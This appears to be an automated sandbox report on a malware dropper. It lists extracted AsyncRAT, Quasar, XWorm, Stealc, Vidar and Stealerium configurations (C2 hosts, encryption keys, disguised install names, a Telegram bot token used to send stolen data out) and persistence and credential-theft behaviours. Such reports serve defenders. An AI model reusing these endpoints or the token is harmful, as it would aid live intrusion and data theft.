asyncrat | e4ec3a45621dd556deeea5f953fa05909c82630e9f17baf6b14272a0360d62d1

max time kernel
599s
max time network
814s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
25-01-2025 00:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4363463463464363463463463.exe.zip
Size

4KB
MD5

16d34133af438a73419a49de605576d9
SHA1

c3dbcd70359fdad8835091c714a7a275c59bd732
SHA256

e4ec3a45621dd556deeea5f953fa05909c82630e9f17baf6b14272a0360d62d1
SHA512

59c0272d6faa2682b7a6ce1cd414d53cc39f06035f4f38a2e206965805034bf8012b02d59f428973965136d70c89f87ac3b17b5db9c1b1d49844be182b47a3d7
SSDEEP

96:xBf1inGx9SfZ+VCv3wlTDMQ1kyKXyyJNOBIKkNvL5qK+7zHf6MlYOQVPGmcEy:xBfwncSf8Cv3w9DZjKXjmBIKEvLs97D5

Malware Config

Extracted

Family

asyncrat

Botnet

Default

one-accordance.gl.at.ply.gg:9590

Attributes

delay
1
install
true
install_file
Windows Defender.exe
install_folder
%AppData%

aes.plain

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

Extazz24535-22930.portmap.host:22930

interestingsigma.hopto.org:20

Mutex

89f58ee5-7af9-42de-843f-2a331a641e3f

Attributes

encryption_key
CD4F349DEB46AEE10C2FE886E5B2BD7A766723CE
install_name
2klz.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Quasar Client Startup
subdirectory
SubDir

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

18.ip.gl.ply.gg:6606

18.ip.gl.ply.gg:7707

18.ip.gl.ply.gg:8808

18.ip.gl.ply.gg:9028

Mutex

7U2HW8ZYjc9H

Attributes

delay
3
install
true
install_file
Discord.exe
install_folder
%AppData%

aes.plain

Extracted

Family

stealc

Botnet

7140196255

http://83.217.209.11

Attributes

url_path
/fd2453cf4b7dd4a4.php

Extracted

Family

xworm

Version

3.0

soon-lp.at.ply.gg:17209

Attributes

Install_directory
%AppData%
install_file
NjRat Dangerous.exe

Extracted

Family

quasar

Version

1.4.1

Botnet

dilly

lvke-45989.portmap.host:45989

Mutex

0cb49dc2-fd0d-4581-ae1e-04154c41f310

Attributes

encryption_key
E5250226804167CB0B1B4B0E9667D0C056694DCA
install_name
defenderx64.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Windows Defender Helper
subdirectory
en

Extracted

Family

xworm

among-publication.at.ply.gg:42209

127.0.0.1:48990

147.185.221.22:48990

Attributes

Install_directory
%Temp%
install_file
USB.exe

Extracted

Family

quasar

Version

1.4.0.0

Botnet

Office

82.117.243.110:5173

Mutex

yfsS9ida0wX8mgpdJC

Attributes

encryption_key
KDNBgA8jiBeGX1rj1dDt
install_name
csrss.exe
log_directory
Logs
reconnect_delay
3000
startup_key
NET framework
subdirectory
SubDir

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

Default

127.0.0.1:6606

127.0.0.1:7707

127.0.0.1:8808

127.0.0.1:8080

127.0.0.1:18274

6.tcp.eu.ngrok.io:6606

6.tcp.eu.ngrok.io:7707

6.tcp.eu.ngrok.io:8808

6.tcp.eu.ngrok.io:8080

6.tcp.eu.ngrok.io:18274

Mutex

AsyncMutex_6SI8OkPnk

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

xworm

Version

5.0

45.141.26.234:7000

Mutex

N8UxQtPS61Z7lofo

Attributes

Install_directory
%ProgramData%
install_file
Java Update(32bit).exe

aes.plain

Extracted

Family

quasar

Version

1.4.1

Botnet

Iwantusamo

98.51.190.130:20

Mutex

de054988-dbed-49f6-834a-dda51ccd494b

Attributes

encryption_key
28DB6A992E078CF6FE82A1042CC979D37C6466CE
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Quasar Client Startup
subdirectory
SubDir

Extracted

Family

vidar

Version

11.3

Botnet

a21440e9f7223be06be5f5e2f94969c7

https://t.me/asg7rd

https://steamcommunity.com/profiles/76561199794498376

Attributes

user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6

Extracted

Family

quasar

Version

1.4.1

Botnet

CleanerV2

192.168.4.185:4782

Mutex

1607a026-352e-4041-bc1f-757dd6cd2e95

Attributes

encryption_key
73BCD6A075C4505333DE1EDC77C7242196AF9552
install_name
Client.exe
log_directory
Clean
reconnect_delay
3000
startup_key
CleanerV2
subdirectory
SubDir

Extracted

Family

stealerium

https://api.telegram.org/bot6926474815:AAFx9tLAnf5OAVQZp2teS3G2_6T1wCP67xM/sendMessage?chat_id=-4224073938

Extracted

Family

quasar

Version

1.4.1

Botnet

SGVP

192.168.1.9:4782

150.129.206.176:4782

Ai-Sgvp-33452.portmap.host:33452

Mutex

a35ec7b7-5a95-4207-8f25-7af0a7847fa5

Attributes

encryption_key
09BBDA8FF0524296F02F8F81158F33C0AA74D487
install_name
User Application Data.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Windowns Client Startup
subdirectory
Quasar

Extracted

Family

quasar

Version

1.4.1

Botnet

main-pc

192.168.100.2:4444

Mutex

979e9520-ec25-48f6-8cd4-516d1007358f

Attributes

encryption_key
6B74F0C858B7E90573D4E97997F2A082B9781250
install_name
main-pc.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Microsoft Service
subdirectory
SubDir

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Detect Vidar Stealer 3 IoCs

stealer

resource	yara_rule
behavioral1/files/0x001b00000002aea4-4092.dat	family_vidar_v7
behavioral1/memory/6432-4101-0x00000000008F0000-0x0000000000BF0000-memory.dmp	family_vidar_v7
behavioral1/memory/6432-4317-0x00000000008F0000-0x0000000000BF0000-memory.dmp	family_vidar_v7

Detect Xworm Payload 8 IoCs

resource	yara_rule
behavioral1/files/0x001900000002ae42-2661.dat	family_xworm
behavioral1/memory/2108-2666-0x0000000000770000-0x0000000000788000-memory.dmp	family_xworm
behavioral1/files/0x001e00000002ae53-2808.dat	family_xworm
behavioral1/memory/3116-2813-0x0000000000010000-0x0000000000066000-memory.dmp	family_xworm
behavioral1/files/0x001d00000002ae74-3487.dat	family_xworm
behavioral1/memory/4516-3492-0x0000000000450000-0x0000000000460000-memory.dmp	family_xworm
behavioral1/files/0x001f00000002ae68-3635.dat	family_xworm
behavioral1/memory/1860-3642-0x00000000005C0000-0x00000000005D6000-memory.dmp	family_xworm

Process spawned unexpected child process 15 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6612	3252	schtasks.exe	168
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6752	3252	schtasks.exe	168
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6088	3252	schtasks.exe	168
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2204	3252	schtasks.exe	168
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3156	3252	schtasks.exe	168
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3436	3252	schtasks.exe	168
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3504	3252	schtasks.exe	168
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6320	3252	schtasks.exe	168
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6388	3252	schtasks.exe	168
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	244	3252	schtasks.exe	168
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6240	3252	schtasks.exe	168
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6696	3252	schtasks.exe	168
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6848	3252	schtasks.exe	168
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5500	3252	schtasks.exe	168
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5384	3252	schtasks.exe	168

Quasar RAT 20 IoCs

Quasar is an open source Remote Access Tool.

trojan spyware quasar

description	flow	ioc	Process
	489	api.ipify.org	Process not Found
	409	api.ipify.org	Process not Found
	394	api.ipify.org	Process not Found
	412	api.ipify.org	Process not Found
	390	api.ipify.org	Process not Found
Key opened		\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
	413	ipinfo.io	Process not Found
	404	ipinfo.io	Process not Found
	323	ip-api.com	Process not Found
	393	api.ipify.org	Process not Found
	390	ipinfo.io	Process not Found
	402	api.ipify.org	Process not Found
	410	ipinfo.io	Process not Found
	407	ipinfo.io	Process not Found
	475	ip-api.com	Process not Found
	395	ipinfo.io	Process not Found
	390	ip-api.com	Process not Found
	398	api.ipify.org	Process not Found
	399	ipinfo.io	Process not Found
	406	api.ipify.org	Process not Found

Quasar family
quasar

Quasar payload 16 IoCs

resource	yara_rule
behavioral1/files/0x0005000000025018-2057.dat	family_quasar
behavioral1/memory/3384-2068-0x0000000000220000-0x0000000000544000-memory.dmp	family_quasar
behavioral1/files/0x001c00000002ade1-2651.dat	family_quasar
behavioral1/memory/1528-2656-0x0000000000010000-0x0000000000334000-memory.dmp	family_quasar
behavioral1/files/0x001900000002ae43-2675.dat	family_quasar
behavioral1/memory/5584-2680-0x00000000002B0000-0x00000000005D4000-memory.dmp	family_quasar
behavioral1/files/0x002100000002ae50-3405.dat	family_quasar
behavioral1/memory/1952-3410-0x0000000000D60000-0x0000000000DAE000-memory.dmp	family_quasar
behavioral1/files/0x001b00000002ae7d-3660.dat	family_quasar
behavioral1/memory/1104-3666-0x0000000000E40000-0x00000000011A6000-memory.dmp	family_quasar
behavioral1/files/0x000400000002a7f2-4396.dat	family_quasar
behavioral1/memory/7892-4402-0x0000000000FA0000-0x00000000012C4000-memory.dmp	family_quasar
behavioral1/files/0x003000000002aafc-5027.dat	family_quasar
behavioral1/memory/6460-5032-0x0000000000610000-0x0000000000934000-memory.dmp	family_quasar
behavioral1/files/0x001a00000002afc1-5596.dat	family_quasar
behavioral1/memory/6764-5603-0x0000000000BA0000-0x0000000000EC4000-memory.dmp	family_quasar

Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc
Stealerium
An open source info stealer written in C# first seen in May 2022.
stealer stealerium
Stealerium family
stealerium
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Vidar family
vidar
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Async RAT payload 4 IoCs

rat

resource	yara_rule
behavioral1/files/0x0003000000024f53-1900.dat	family_asyncrat
behavioral1/files/0x0005000000025aa0-2164.dat	family_asyncrat
behavioral1/files/0x001b00000002ae72-3423.dat	family_asyncrat
behavioral1/files/0x003300000002acf5-5107.dat	family_asyncrat

Blocklisted process makes network request 1 IoCs

flow	pid	Process
607	7716	staticfile.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3728	powershell.exe
3744	powershell.exe
6412	powershell.exe
4244	powershell.exe
4732	powershell.exe
6572	powershell.exe
6724	powershell.exe
5480	powershell.exe
6000	powershell.exe
5340	powershell.exe
5396	powershell.exe
7044	powershell.exe

Downloads MZ/PE file 30 IoCs

flow	pid	Process
579	896	4363463463464363463463463.exe
366	896	4363463463464363463463463.exe
366	896	4363463463464363463463463.exe
321	2080	4363463463464363463463463.exe
486	896	4363463463464363463463463.exe
434	896	4363463463464363463463463.exe
283	896	4363463463464363463463463.exe
295	4464	4363463463464363463463463.exe
382	2080	4363463463464363463463463.exe
320	2080	4363463463464363463463463.exe
422	896	4363463463464363463463463.exe
473	2080	4363463463464363463463463.exe
330	4464	4363463463464363463463463.exe
330	4464	4363463463464363463463463.exe
191	896	4363463463464363463463463.exe
303	896	4363463463464363463463463.exe
367	2080	4363463463464363463463463.exe
384	2080	4363463463464363463463463.exe
189	896	4363463463464363463463463.exe
195	2080	4363463463464363463463463.exe
195	2080	4363463463464363463463463.exe
195	2080	4363463463464363463463463.exe
195	2080	4363463463464363463463463.exe
195	2080	4363463463464363463463463.exe
195	2080	4363463463464363463463463.exe
195	2080	4363463463464363463463463.exe
195	2080	4363463463464363463463463.exe
195	2080	4363463463464363463463463.exe
195	2080	4363463463464363463463463.exe
318	2080	4363463463464363463463463.exe

Modifies Windows Firewall 2 TTPs 3 IoCs

defense_evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
5968	netsh.exe
4736	netsh.exe
1548	netsh.exe

Sets file to hidden 1 TTPs 1 IoCs

Modifies file attributes to stop it showing in Explorer etc.

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
5692	attrib.exe

A potential corporate email address has been identified in the URL: [email protected]
phishing

Drops startup file 15 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk	msedge..exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\031d13bbbb63d50987953ffedfddbc61Windows Update.exe	server.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe.exe	server.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk	msedge..exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java Update(32bit).lnk	XClient.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java Update(32bit).lnk	XClient.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe.exe	server.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\123.exe	123.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\031d13bbbb63d50987953ffedfddbc61Windows Update.exe	server.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NJRAT%20DANGEROUS.lnk	NJRAT%20DANGEROUS.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NJRAT%20DANGEROUS.lnk	NJRAT%20DANGEROUS.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\imagelogger.lnk	imagelogger.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\imagelogger.lnk	imagelogger.exe

Executes dropped EXE 64 IoCs

pid	Process
2080	4363463463464363463463463.exe
896	4363463463464363463463463.exe
4864	Agentnov.exe
872	Loader.exe
2764	Windows Defender.exe
5692	NVIDIAS.exe
3552	WinIntoruntime.exe
2632	staticfile.exe
3384	2klz.exe
2344	2klz.exe
4628	Discord3.exe
5760	2klz.exe
5456	staticfile.exe
3912	Discord.exe
1872	staticfile.exe
5440	2klz.exe
4416	2klz.exe
2628	staticfile.exe
4464	4363463463464363463463463.exe
1556	BootstrapperNew.exe
5596	2klz.exe
1872	staticfile.exe
1148	2klz.exe
3004	pothjadwtrgh.exe
6092	file.exe
2144	Extension-http.exe
5696	staticfile.exe
4720	2klz.exe
4616	staticfile.exe
4336	2klz.exe
2208	staticfile.exe
1100	k360.exe
1528	Client-built.exe
2108	NJRAT%20DANGEROUS.exe
2008	Client.exe
3056	2klz.exe
5584	defender64.exe
5448	defenderx64.exe
4668	staticfile.exe
4756	Client.exe
1032	2klz.exe
4244	staticfile.exe
4800	defenderx64.exe
1800	r2.exe
3116	imagelogger.exe
5612	staticfile.exe
3248	2klz.exe
4868	Client.exe
4672	defenderx64.exe
1176	staticfile.exe
1044	Client.exe
5156	2klz.exe
4808	defenderx64.exe
1740	dmshell.exe
4880	NJRAT%20DANGEROUS.exe
1304	2klz.exe
3764	Client.exe
1644	defenderx64.exe
3780	staticfile.exe
724	staticfile.exe
3004	Client.exe
2328	2klz.exe
3716	defenderx64.exe
4796	cdb.exe

Loads dropped DLL 64 IoCs

pid	Process
6092	file.exe
6092	file.exe
6092	file.exe
6092	file.exe
1800	r2.exe
1800	r2.exe
1800	r2.exe
1800	r2.exe
1800	r2.exe
1800	r2.exe
1800	r2.exe
420	123.exe
420	123.exe
420	123.exe
420	123.exe
420	123.exe
420	123.exe
420	123.exe
420	123.exe
420	123.exe
420	123.exe
420	123.exe
420	123.exe
420	123.exe
420	123.exe
420	123.exe
420	123.exe
420	123.exe
420	123.exe
420	123.exe
420	123.exe
420	123.exe
420	123.exe
420	123.exe
420	123.exe
420	123.exe
420	123.exe
420	123.exe
420	123.exe
420	123.exe
420	123.exe
420	123.exe
420	123.exe
420	123.exe
420	123.exe
420	123.exe
420	123.exe
420	123.exe
420	123.exe
420	123.exe
420	123.exe
420	123.exe
420	123.exe
420	123.exe
420	123.exe
420	123.exe
420	123.exe
420	123.exe
420	123.exe
420	123.exe
420	123.exe
420	123.exe
420	123.exe
420	123.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Run\NJRAT%20DANGEROUS = "C:\\Users\\Admin\\AppData\\Roaming\\NJRAT%20DANGEROUS.exe"	NJRAT%20DANGEROUS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Run\Java Update(32bit) = "C:\\ProgramData\\Java Update(32bit).exe"	XClient.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\svchost.exe"	msedge..exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 62 IoCs

Web Service

T1102

flow	ioc
512	discord.com
549	discord.com
579	raw.githubusercontent.com
601	raw.githubusercontent.com
405	discord.com
237	drive.google.com
543	discord.com
546	discord.com
189	raw.githubusercontent.com
330	raw.githubusercontent.com
488	discord.com
510	discord.com
236	drive.google.com
522	discord.com
225	drive.google.com
511	discord.com
526	discord.com
531	discord.com
534	discord.com
582	raw.githubusercontent.com
396	discord.com
594	raw.githubusercontent.com
547	discord.com
520	discord.com
533	discord.com
555	discord.com
411	discord.com
532	discord.com
535	discord.com
722	raw.githubusercontent.com
408	discord.com
524	discord.com
539	discord.com
548	discord.com
602	raw.githubusercontent.com
390	discord.com
509	discord.com
527	discord.com
422	raw.githubusercontent.com
553	discord.com
122	raw.githubusercontent.com
537	discord.com
844	raw.githubusercontent.com
195	raw.githubusercontent.com
414	discord.com
513	discord.com
514	discord.com
544	discord.com
556	discord.com
599	raw.githubusercontent.com
400	discord.com
516	discord.com
525	discord.com
536	discord.com
551	discord.com
598	raw.githubusercontent.com
421	raw.githubusercontent.com
528	discord.com
600	raw.githubusercontent.com
490	discord.com
597	raw.githubusercontent.com
517	discord.com

Looks up external IP address via web service 19 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
395	ipinfo.io
404	ipinfo.io
406	api.ipify.org
413	ipinfo.io
475	ip-api.com
489	api.ipify.org
390	api.ipify.org
390	ip-api.com
394	api.ipify.org
402	api.ipify.org
407	ipinfo.io
409	api.ipify.org
410	ipinfo.io
390	ipinfo.io
393	api.ipify.org
398	api.ipify.org
412	api.ipify.org
323	ip-api.com
399	ipinfo.io

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\svchost.exe.exe	server.exe
File opened for modification	C:\Windows\SysWOW64\svchost.exe.exe	server.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1144 set thread context of 6208	1144	msn.exe	734

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/1800-2797-0x000000006FC40000-0x000000006FC4A000-memory.dmp	upx
behavioral1/memory/1800-2855-0x000000006FC40000-0x000000006FC4A000-memory.dmp	upx
behavioral1/memory/8044-5582-0x000000006CD60000-0x000000006D04D000-memory.dmp	upx

Drops file in Program Files directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\360\360Safe\safemon\360tray.exe	k360.exe
File opened for modification	C:\Program Files (x86)\360\360sd\360sd.exe	k360.exe
File created	C:\Program Files (x86)\svchost.exe.exe	server.exe
File opened for modification	C:\Program Files (x86)\svchost.exe.exe	server.exe
File created	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\OfficeClickToRun.exe	Portcrt.exe
File created	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\e6c9b481da804f	Portcrt.exe

Drops file in Windows directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp\Crashpad\metadata	setup.exe
File opened for modification	C:\Windows\SystemTemp\Crashpad\settings.dat	setup.exe
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File opened for modification	C:\Windows\SystemTemp	setup.exe

Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs

defense_evasion privilege_escalation

Create Process with Token

T1134.002

pid	Process
7472	mshta.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Detects Pyinstaller 2 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x001c00000002adf9-2997.dat	pyinstaller
behavioral1/files/0x001f00000002ae73-3823.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Program crash 1 IoCs

pid	pid_target	Process	procid_target
2328	5692	WerFault.exe	162

System Location Discovery: System Language Discovery 1 TTPs 39 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Discord.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	njrtdhadawt.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Agentnov.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pothjadwtrgh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	file.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ZubovLekciya.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msn.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4363463463464363463463463.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Discord3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	r2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msn.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4363463463464363463463463.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NVIDIAS.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4363463463464363463463463.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Extension-http.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AsyncClient.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	testingg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Wallet-PrivateKey.Pdf.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	compiled.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	compiled.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	jerniuiopu.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 64 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3052	PING.EXE
6408	PING.EXE
5396	PING.EXE
4880	PING.EXE
6308	PING.EXE
7496	PING.EXE
7840	PING.EXE
5004	PING.EXE
2880	PING.EXE
6352	PING.EXE
7648	PING.EXE
1468	PING.EXE
3904	PING.EXE
244	PING.EXE
7680	PING.EXE
4556	PING.EXE
1876	PING.EXE
7764	PING.EXE
2464	PING.EXE
1440	PING.EXE
4548	PING.EXE
5036	PING.EXE
3884	PING.EXE
7164	PING.EXE
2360	PING.EXE
7548	PING.EXE
4924	PING.EXE
7904	PING.EXE
1800	PING.EXE
4968	PING.EXE
8108	PING.EXE
2844	PING.EXE
3572	PING.EXE
1020	PING.EXE
3000	PING.EXE
5116	PING.EXE
7520	PING.EXE
7980	PING.EXE
7756	PING.EXE
2436	PING.EXE
5824	PING.EXE
6140	PING.EXE
2800	PING.EXE
8008	PING.EXE
5632	PING.EXE
7868	PING.EXE
5204	Process not Found
6840	Process not Found
6040	PING.EXE
4984	PING.EXE
3924	PING.EXE
7608	PING.EXE
6224	PING.EXE
